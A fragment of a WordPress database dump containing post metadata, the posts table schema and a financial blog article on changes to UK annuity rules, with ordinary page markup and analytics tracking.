5D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1378306549\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"40\";s:3:\"iso\";s:3:\"500\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1100,289,'_wp_attached_file','2017/09/IMG_1113.jpg'),(1101,289,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2017/09/IMG_1113.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_1113-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_1113-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_1113-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_1113-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 5D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1378306558\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"42\";s:3:\"iso\";s:3:\"640\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1102,290,'_wp_attached_file','2017/09/IMG_1230.jpg'),(1103,290,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2017/09/IMG_1230.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_1230-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_1230-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_1230-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_1230-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 5D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1378307953\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"32\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1104,291,'_wp_attached_file','2017/09/IMG_1241.jpg'),(1105,291,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2017/09/IMG_1241.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_1241-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_1241-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_1241-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_1241-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 5D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1378308046\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"48\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1106,277,'_wp_attachment_is_custom_background','city-store'),(1111,64,'_edit_lock','1507805168:1'),(1112,49,'_edit_lock','1506014173:1'),(1113,294,'fw_options','a:0:{}'),(1114,295,'fw_options','a:0:{}'),(1115,49,'_edit_last','1'),(1116,49,'_wp_page_template','default'),(1117,49,'_yoast_wpseo_content_score','30'),(1118,296,'fw_options','a:0:{}'),(1119,64,'_edit_last','1'),(1120,64,'_wp_page_template','default'),(1121,64,'_yoast_wpseo_content_score','30'),(1122,297,'fw_options','a:0:{}'),(1123,298,'_menu_item_type','post_type'),(1124,298,'_menu_item_menu_item_parent','0'),(1125,298,'_menu_item_object_id','115'),(1126,298,'_menu_item_object','page'),(1127,298,'_menu_item_target',''),(1128,298,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1129,298,'_menu_item_xfn',''),(1130,298,'_menu_item_url',''),(1132,299,'_menu_item_type','post_type'),(1133,299,'_menu_item_menu_item_parent','0'),(1134,299,'_menu_item_object_id','114'),(1135,299,'_menu_item_object','page'),(1136,299,'_menu_item_target',''),(1137,299,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1138,299,'_menu_item_xfn',''),(1139,299,'_menu_item_url',''),(1141,300,'_menu_item_type','post_type'),(1142,300,'_menu_item_menu_item_parent','299'),(1143,300,'_menu_item_object_id','108'),(1144,300,'_menu_item_object','page'),(1145,300,'_menu_item_target',''),(1146,300,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1147,300,'_menu_item_xfn',''),(1148,300,'_menu_item_url',''),(1150,298,'_yst_is_cornerstone',''),(1151,298,'_dw_megamenu_type','column'),(1152,298,'_dw_megamenu_sicon',''),(1153,299,'_yst_is_cornerstone',''),(1154,299,'_dw_megamenu_type','column'),(1155,299,'_dw_megamenu_sicon',''),(1156,300,'_yst_is_cornerstone',''),(1157,300,'_dw_megamenu_type','column'),(1158,300,'_dw_megamenu_sicon',''),(1159,56,'_edit_last','1'),(1160,56,'_wp_page_template','default'),(1161,301,'fw_options','a:0:{}'),(1162,56,'_edit_lock','1506013119:1'),(1163,57,'_edit_last','1'),(1164,57,'_wp_page_template','default'),(1165,302,'fw_options','a:0:{}'),(1166,57,'_edit_lock','1506013171:1'),(1167,121,'_edit_lock','1506013273:1'),(1168,121,'_edit_last','1'),(1169,121,'_wp_page_template','default'),(1170,121,'_yoast_wpseo_content_score','30'),(1171,303,'fw_options','a:0:{}'),(1172,46,'_edit_lock','1506013362:1'),(1173,304,'fw_options','a:0:{}'),(1174,46,'_edit_last','1'),(1175,46,'_wp_page_template','default'),(1176,46,'_yoast_wpseo_content_score','30'),(1177,305,'fw_options','a:0:{}'),(1178,306,'fw_options','a:0:{}'),(1179,307,'fw_options','a:0:{}'),(1180,308,'_menu_item_type','post_type'),(1181,308,'_menu_item_menu_item_parent','0'),(1182,308,'_menu_item_object_id','49'),(1183,308,'_menu_item_object','page'),(1184,308,'_menu_item_target',''),(1185,308,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1186,308,'_menu_item_xfn',''),(1187,308,'_menu_item_url',''),(1189,308,'_yst_is_cornerstone',''),(1190,308,'_dw_megamenu_type','column'),(1191,308,'_dw_megamenu_sicon',''),(1192,309,'fw_options','a:0:{}'),(1193,310,'fw_options','a:0:{}'),(1194,120,'_edit_lock','1526895050:1'),(1195,311,'fw_options','a:0:{}'),(1196,120,'_edit_last','1'),(1197,120,'_wp_page_template','default'),(1198,120,'_yoast_wpseo_content_score','30'),(1199,312,'fw_options','a:0:{}'),(1200,313,'fw_options','a:0:{}'),(1201,314,'fw_options','a:0:{}'),(1202,70,'_edit_lock','1506014490:1'),(1203,315,'fw_options','a:0:{}'),(1204,70,'_edit_last','1'),(1205,70,'_wp_page_template','default'),(1206,70,'_yoast_wpseo_content_score','30'),(1207,316,'fw_options','a:0:{}'),(1208,65,'_edit_lock','1545213726:1'),(1209,317,'fw_options','a:0:{}'),(1210,65,'_edit_last','1'),(1211,65,'_wp_page_template','default'),(1212,65,'_yoast_wpseo_content_score','30'),(1213,318,'fw_options','a:0:{}'),(1214,319,'fw_options','a:0:{}'),(1216,321,'fw_options','a:0:{}'),(1219,47,'_yoast_wpseo_content_score','60'),(1220,322,'fw_options','a:0:{}'),(1221,47,'_yoast_wpseo_primary_category',''),(1224,323,'fw_options','a:0:{}'),(1227,324,'fw_options','a:0:{}'),(1228,58,'_edit_last','1'),(1229,58,'_wp_page_template','default'),(1232,325,'fw_options','a:0:{}'),(1233,58,'_edit_lock','1506015313:1'),(1234,59,'_edit_last','1'),(1235,59,'_wp_page_template','default'),(1238,326,'fw_options','a:0:{}'),(1239,59,'_edit_lock','1506015332:1'),(1244,66,'_edit_last','1'),(1245,66,'_wp_page_template','default'),(1246,327,'fw_options','a:0:{}'),(1247,66,'_edit_lock','1506015346:1'),(1248,41,'_edit_last','1'),(1249,41,'_wp_page_template','default'),(1252,328,'fw_options','a:0:{}'),(1253,41,'_edit_lock','1506015359:1'),(1254,90,'_edit_last','1'),(1255,90,'_wp_page_template','default'),(1256,329,'fw_options','a:0:{}'),(1257,90,'_edit_lock','1506015397:1'),(1258,84,'_edit_last','1'),(1259,84,'_wp_page_template','default'),(1262,330,'fw_options','a:0:{}'),(1263,84,'_edit_lock','1506015472:1'),(1264,52,'_edit_last','1'),(1265,52,'_wp_page_template','default'),(1268,331,'fw_options','a:0:{}'),(1269,52,'_edit_lock','1506015422:1'),(1270,332,'fw_options','a:0:{}'),(1273,84,'_yoast_wpseo_content_score','60'),(1274,333,'fw_options','a:0:{}'),(1275,84,'_yoast_wpseo_primary_category',''),(1277,115,'_edit_lock','1507807411:1'),(1278,335,'fw_options','a:0:{}'),(1279,115,'_edit_last','1'),(1280,115,'_wp_page_template','default'),(1281,115,'_yoast_wpseo_content_score','90'),(1282,336,'fw_options','a:0:{}'),(1283,337,'_yst_is_cornerstone',''),(1284,337,'_edit_last','1'),(1285,337,'_wp_page_template','default'),(1286,337,'_yoast_wpseo_content_score','30'),(1287,338,'fw_options','a:0:{}'),(1288,337,'_edit_lock','1507806302:1'),(1289,339,'fw_options','a:0:{}'),(1290,340,'fw_options','a:0:{}'),(1291,341,'fw_options','a:0:{}'),(1292,342,'fw_options','a:0:{}'),(1293,343,'fw_options','a:0:{}'),(1294,344,'fw_options','a:0:{}'),(1295,345,'fw_options','a:0:{}'),(1296,346,'fw_options','a:0:{}'),(1298,348,'fw_options','a:0:{}'),(1299,349,'fw_options','a:0:{}'),(1300,350,'fw_options','a:0:{}'),(1301,351,'fw_options','a:0:{}'),(1302,352,'fw_options','a:0:{}'),(1304,354,'fw_options','a:0:{}'),(1306,356,'fw_options','a:0:{}'),(1307,357,'fw_options','a:0:{}'),(1308,358,'fw_options','a:0:{}'),(1309,359,'_wp_attached_file','2018/12/divorce.jpg'),(1310,359,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:19:\"2018/12/divorce.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"divorce-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"divorce-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"divorce-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1311,359,'_wp_attachment_image_alt','Divorce settlements'),(1312,360,'fw_options','a:0:{}');
/*!40000 ALTER TABLE `wp_postmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_posts`
--

DROP TABLE IF EXISTS `wp_posts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_posts` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_author` bigint(20) unsigned NOT NULL DEFAULT 0,
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext NOT NULL,
  `post_title` text NOT NULL,
  `post_excerpt` text NOT NULL,
  `post_status` varchar(20) NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) NOT NULL DEFAULT 'open',
  `post_password` varchar(255) NOT NULL DEFAULT '',
  `post_name` varchar(200) NOT NULL DEFAULT '',
  `to_ping` text NOT NULL,
  `pinged` text NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext NOT NULL,
  `post_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `guid` varchar(255) NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT 0,
  `post_type` varchar(20) NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`ID`),
  KEY `post_name` (`post_name`(191)),
  KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  KEY `post_parent` (`post_parent`),
  KEY `post_author` (`post_author`)
) ENGINE=InnoDB AUTO_INCREMENT=370 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_posts`
--

LOCK TABLES `wp_posts` WRITE;
/*!40000 ALTER TABLE `wp_posts` DISABLE KEYS */;
INSERT INTO `wp_posts` VALUES (41,1,'2017-09-21 16:34:25','2017-09-21 16:34:25','<body class=\"single single-post postid-8787 single-format-standard light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n			<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										How Annuities Have Changed Since The Budget										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"../category/wealth-management/\" title=\"Wealth Management\">Wealth Management</a></li><li><a href=\"../category/pensions/\" title=\"Pensions\">Pensions</a></li><li><a href=\"../category/annuities/\" title=\"Annuities\">Annuities</a></li><li>How Annuities Have Changed Since The Budget</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n																			<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n		&#13;\n										<div id=\"post-8787\" class=\"post-8787 post type-post status-publish format-standard has-post-thumbnail hentry category-annuities category-pensions category-wealth-management post\">&#13;\n												<span class=\"entry-title\" style=\"display: none;\">How Annuities Have Changed Since The Budget</span>&#13;\n						<div class=\"post-content\">&#13;\n				<h2><span id=\"current_wiki_title\">How Annuities Have Changed Since The Budget</span></h2>&#13;\n<p>Good news, annuities are no longer compulsory.<br/></p>&#13;\n&#13;\n<p/>&#13;\n<p/>&#13;\n<p>Annuity is a term that until recently everyone had heard of but few of us not of retirement age knew what it meant. The March 2017 budget changed that. Suddenly annuities became big news and exciting stories about the possibility of Lamborghini driving pensioners were splashed across the <a href=\"http://www.theguardian.com/money/2014/mar/29/lamborghini-tax-pension-changes-annuities\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-article\',\'http://www.theguardian.com\']);\">newspapers</a>.</p>&#13;\n<p>This article is a quick look at the changes to annuities and how they will affect you, so the first thing to do is to explain specifically what annuities are, and how they have changed.</p>&#13;\n<p/>&#13;\n<p/>&#13;\n<p>An annuity is an insurance policy that people saving for their retirement can buy at retirement and it will guarantee a fixed annual payment for life, so it essentially acts as a private payment. Here are the five changes you need to know about.</p>&#13;\n<p/>&#13;\n<p><span style=\"color: #0000ff;\">1) Annuities Are No Longer Compulsory</span></p>&#13;\n<p>On certain types of pension, an annuity policy has been mandatory in the past. Defined contribution pensions have been subject to hefty penalties for savers who have not opted into an annuity, whereas state pensions and final salary pensions have been exempt.</p>&#13;\n<p>The mandatory nature of this policy has obviously been very popular with the insurance companies, who have seen a fixed and sizeable amount of money flow into their coffers every year.</p>&#13;\n<p>To bring annuities policy on defined contribution pensions into line with other types of pension, the Chancellor of the Exchequer George Osborne has removed penalties for retirees who don’t take a policy out.</p>&#13;\n<p/>&#13;\n<p><span style=\"color: #0000ff;\">2) Good News For Retirees, Bad News For The Insurance Industry</span></p>&#13;\n<p>The changes that the government has introduced allow greater flexibility for pensioners who are planning their futures, but they have hit the insurance companies hard, with <a href=\"http://news.sky.com/story/1228619/pension-firms-lose-billions-after-speech\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-article\',\'http://news.sky.com\']);\">nearly £5bn</a>wiped off share prices following the announcement.</p>&#13;\n<p>Having greater flexibility in your pension plans can only be a good thing, despite sensational tabloid headlines that now pensioners could access their entire fund in a lump sum and buy a racehorse, yacht or luxury car with it.</p>&#13;\n<p>Most retirees will be far more sensible than this; the new rules could enable them to spend a portion of their overall pension on paying off outstanding mortgages and debts.</p>&#13;\n<p/>&#13;\n<p><span style=\"color: #0000ff;\">3) You Can Buy An Annuity If You Want One</span></p>&#13;\n<p>It must be said here that annuities haven’t been banned, plenty of people will still purchase them and get good use out of such policies.</p>&#13;\n<p>By removing the punitive charges on defined contribution pensions that don’t have an annuity policy, savers have the opportunity to use some of their lump sum for other purposes before purchasing an annuity if they choose.</p>&#13;\n<p>There are of course alternatives to buying annuities which may be worth investigating, the main two being the capped and flexible draw down plans.</p>&#13;\n<p>These policies allow you to keep your wealth invested but to draw in income from it as well. The capped drawdown has a fixed limit on how much can be withdrawn, which will be a percentage of the limit set by the Government Actuary Department.</p>&#13;\n<p>This figure is set based on the age of the saver and the percentage of it that can be drawn down can be anywhere between zero and 150 percent of this. If this seems restrictive, then a flexible drawdown policy may allow you to access an unlimited amount of the pension pot as you see fit.</p>&#13;\n<p/>&#13;\n<p><span style=\"color: #0000ff;\">4) Joint Annuities Are Also Worth Considering</span></p>&#13;\n<p>If you are married or in a civil partnership, it might be worth considering taking out a joint annuity policy together if you are both retiring at roughly the same time.</p>&#13;\n<p>When one or other partner passes away in later life, the surviving retiree will continue to receive payments based on the combined contribution of both pensioners to the annuity policy.</p>&#13;\n<p>This means that the right policy can potentially act as an annuity and, to some degree as a life insurance policy (however, as with all such things, it is important to read the terms and conditions and ensure this is a suitable policy for you). As insurers are likely to have to pay a policy for longer, you can be sure they will make their money back in one way or another, either with higher fees or lower annual rates.</p>&#13;\n<p/>&#13;\n<p><span style=\"color: #0000ff;\">5) Annuities And Long Term Care</span></p>&#13;\n<p>Whilst the market for annuities has been liberalised there are still several good reasons for considering such policies, the main one being the cost of long term old age care.</p>&#13;\n<p>A long term care annuity works much like any other annuity policy but is typically not paid directly to the policy holder.</p>&#13;\n<p>Instead it will be paid out directly to the care provider, meaning that if in the event of infirmity in old age, the policy holder is not saddled with the responsibility of arranging care payments.</p>&#13;\n<p>Overall there is much to be positive about in the annuities market, they are still useful financial products, but since the end of the virtually compulsory enforcement of the annuity, insurers will have to offer more competitive deals to secure your custom.</p>&#13;\n<p>If you would like to discuss whether such a move might be the right option for you and your family, then – as always – we are only a phone call or an e-mail away.</p>&#13;\n							</div>&#13;\n									<div class=\"meta-info\">&#13;\n				<div class=\"vcard\">&#13;\n					By <span class=\"fn\"><a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></span><span class=\"sep\">|</span>Categories: <a href=\"../category/annuities/\" title=\"View all posts in Annuities\" rel=\"category tag\">Annuities</a>, <a href=\"../category/pensions/\" title=\"View all posts in Pensions\" rel=\"category tag\">Pensions</a>, <a href=\"../category/wealth-management/\" title=\"View all posts in Wealth Management\" rel=\"category tag\">Wealth Management</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a href=\"../5-facts-know-annuities/\" title=\"Comment on How Annuities Have Changed Since The Budget\">0 Comments</a>				</div>&#13;\n			</div>&#13;\n												<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/5-facts-know-annuities/&amp;p[title]=How%20Annuities%20Have%20Changed%20Since%20The%20Budget\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=How+Annuities+Have+Changed+Since+The+Budget%20http://www.equalitywalk.org.uk/5-facts-know-annuities/\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/5-facts-know-annuities/&amp;title=How%20Annuities%20Have%20Changed%20Since%20The%20Budget\" target=\"_blank\" rel=\"nofollow\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"reddit\">&#13;\n						<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/5-facts-know-annuities/&amp;title=How%20Annuities%20Have%20Changed%20Since%20The%20Budget\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Reddit&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Reddit</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tumblr\">&#13;\n						<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2F5-facts-know-annuities%2F&amp;name=How+Annuities+Have+Changed+Since+The+Budget&amp;description=This+article+looks+at+the+changes+to+annuities+and+how+they+will+affect+you%2C+so+the+first+thing+to+do+is+to+explain+specifically+what+they+are+and+how+they+have+changed...\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Tumblr&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Tumblr</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/5-facts-know-annuities/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', \'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tf-pinterest\">&#13;\n												<a href=\"#\">&#13;\n							Pinterest&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Pinterest</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"email\">&#13;\n						<a href=\"mailto:?subject=How Annuities Have Changed Since The Budget&amp;body=http://www.equalitywalk.org.uk/5-facts-know-annuities/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n									<div class=\"about-author\">&#13;\n				<div class=\"title\"><h2>About the Author: <a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div class=\"about-author-container\">&#13;\n					<div class=\"avatar\">&#13;\n											</div>&#13;\n					<div class=\"description\"/>&#13;\n				</div>&#13;\n			</div>&#13;\n			&#13;\n												&#13;\n							&#13;\n<!-- You can start editing here. -->&#13;\n&#13;\n&#13;\n			<!-- If comments are open, but there are no comments. -->&#13;\n&#13;\n	 &#13;\n&#13;\n&#13;\n									<div id=\"respond\" class=\"comment-respond\">&#13;\n				<h3 id=\"reply-title\" class=\"comment-reply-title\"><div class=\"title\"><h2> </h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div> <small><a rel=\"nofollow\" id=\"cancel-comment-reply-link\" href=\"../5-facts-know-annuities/\" style=\"display:none;\">Cancel reply</a></small>&#13;\n									&#13;\n							</h3></div><!-- #respond -->&#13;\n			        <script type=\"text/javascript\"><![CDATA[\r\n            jQuery(document).ready(function () {\r\n                jQuery(\'#commentform\').submit(function () {\r\n                    _gaq.push(\r\n                            [\'_setAccount\', \'UA-10958181-3\'],\r\n                            [\'_trackEvent\', \'comment\', \'submit\']\r\n                    );\r\n                });\r\n            });\r\n        ]]></script></div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"float:right;\">&#13;\n	<div id=\"text-24\" class=\"widget widget_text\">			<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big><br/><br/>people who get our best financial wisdom on a weekly basis.</center><br/><a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"/><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>&#13;\n		</div><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity 